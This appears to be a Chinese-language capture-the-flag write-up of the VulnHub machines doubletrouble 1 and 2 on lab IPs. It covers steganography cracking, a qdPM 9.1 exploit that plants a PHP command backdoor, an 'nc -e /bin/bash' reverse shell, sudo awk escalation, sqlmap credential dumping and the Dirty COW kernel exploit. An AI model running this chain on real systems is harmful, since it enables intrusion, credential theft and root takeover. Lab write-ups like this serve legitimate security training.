vulnhub靶机-doubletrouble: 1

环境信息

攻击机：192.168.100.128
靶机：192.168.100.130

doubletrouble-1靶机渗透

一、主机发现

arp-scan -l

发现靶机ip

二、端口扫描

发现开放80，22端口
访问80端口

进行弱口令，注入都没有得到结果，发现qdPM，版本9.1，先拿小本本记住这个发现

三、目录遍历

每个都打开看一下，发现在secret目录下有一个jpg图片

四、渗透测试

使用steghide工具先查看一下图片基本信息

apt-get install steghide

发现一张可以图片，看一下是否有隐写

发现需要密码，但是现在没有可以用的密码
使用stegseek进行爆破

https://github.com/RickdeJager/stegseek/releases #stegseek下载地址,下载stegseek_0.6-1.deb
apt install stegseek_0.6-1.deb路径 #安装stegseek

解压kali字典，使用kali自带字典进行爆破

gunzip /usr/share/wordlists/rockyou.txt.gz #kali自带字典，需要先解压
mkdir dict #创建一个文件夹用来存放rockyou.txt字典
cp /usr/share/wordlists/rockyou.txt /root/dict/ #将解压的字典复制到dict文件夹里

打开doubletrouble.jpg.out

看到账号密码，尝试登录

发现这里有上传点


方法一：上传冰蝎马，进行连接

方法二：kali中自带有漏洞库，通过漏洞库的查找可以找到与qdPM9.1有关的漏洞进行POC测试
searchsploit -u 更新漏洞库

可以看到有很多poc可以利用

searchsploit -m 50175.py

进行下载

打开50175.py发现有一些错误，大部分都是换行的问题，进行修改即可
进行后门的生成

python3 50175.py -url http://192.168.100.130/ -u [email protected] -p otis666

访问后门地址

点击生成的php文件在url后面加?cmd=想要执行的命令

用nc进行监听，进行反弹shell

在浏览器输入 nc -e /bin/bash ip 1234

连接成功
执行python3 -c 'import pty;pty.spawn("/bin/bash")'进行反弹会话

五、提权

使用sudo -l查看该用户是否具有sudo权限

发现awk可以进行无密码使用sudo操作

进行提权
sudo awk ‘BEGIN {system(“/bin/bash”)}’

成功拿到管理员权限
进到root目录下发现还有一个靶机

我们把靶机复制到uploads目录下

cp doubletrouble.ova /var/www/html/uploads

进行下载

doubletrouble-2靶机渗透

一、主机发现

二、端口扫描

还是开放80，22端口

三、渗透测试

访问80端口

进行测试发现有时间型盲注

sqlmap -r sqlmap.txt --batch

进行爆库

sqlmap -r sqlmap.txt --batch --dbs

爆表

sqlmap -r sqlmap.txt --batch -D doubletrouble --tables

爆列

sqlmap -r sqlmap.txt --batch -D doubletrouble -T users --colums

爆字段

sqlmap -r sqlmap.txt --batch -D doubletrouble -T users -C username,password --dump

这时候想到开放22端口，进行ssh连接
montreux不可以进行连接

clapton可以连接

四、提权

使用sudo -l查看权限
发现该用户不具有sudo权限

查看系统内核

发现系统内核版本是linux3.2，有脏牛提权漏洞

searchsploit linux 3.2

40616.c是关于脏牛提权的，进行下载

searchsploit -m 40616.c

查看一下如何使用
先使用gcc连接，然后直接使用，后面不用跟其他命令

使用nc传输，将40616.c传输到clapton系统中
在clapton的shell中启动nc接收

nc -lvnp 10086 > 40616.c

在kali中使用nc上传40616.c

nc 192.168.100.131 10086 < 40616.c -w 1

传输完成

发现user.txt，打开查看

进行解密

继续提权
40616.c没有执行权限，进行赋予权限

chmod 777 40616.c

在使用gcc生成一个执行程序

执行可执行文件

进入root目录，发现flag

大功告成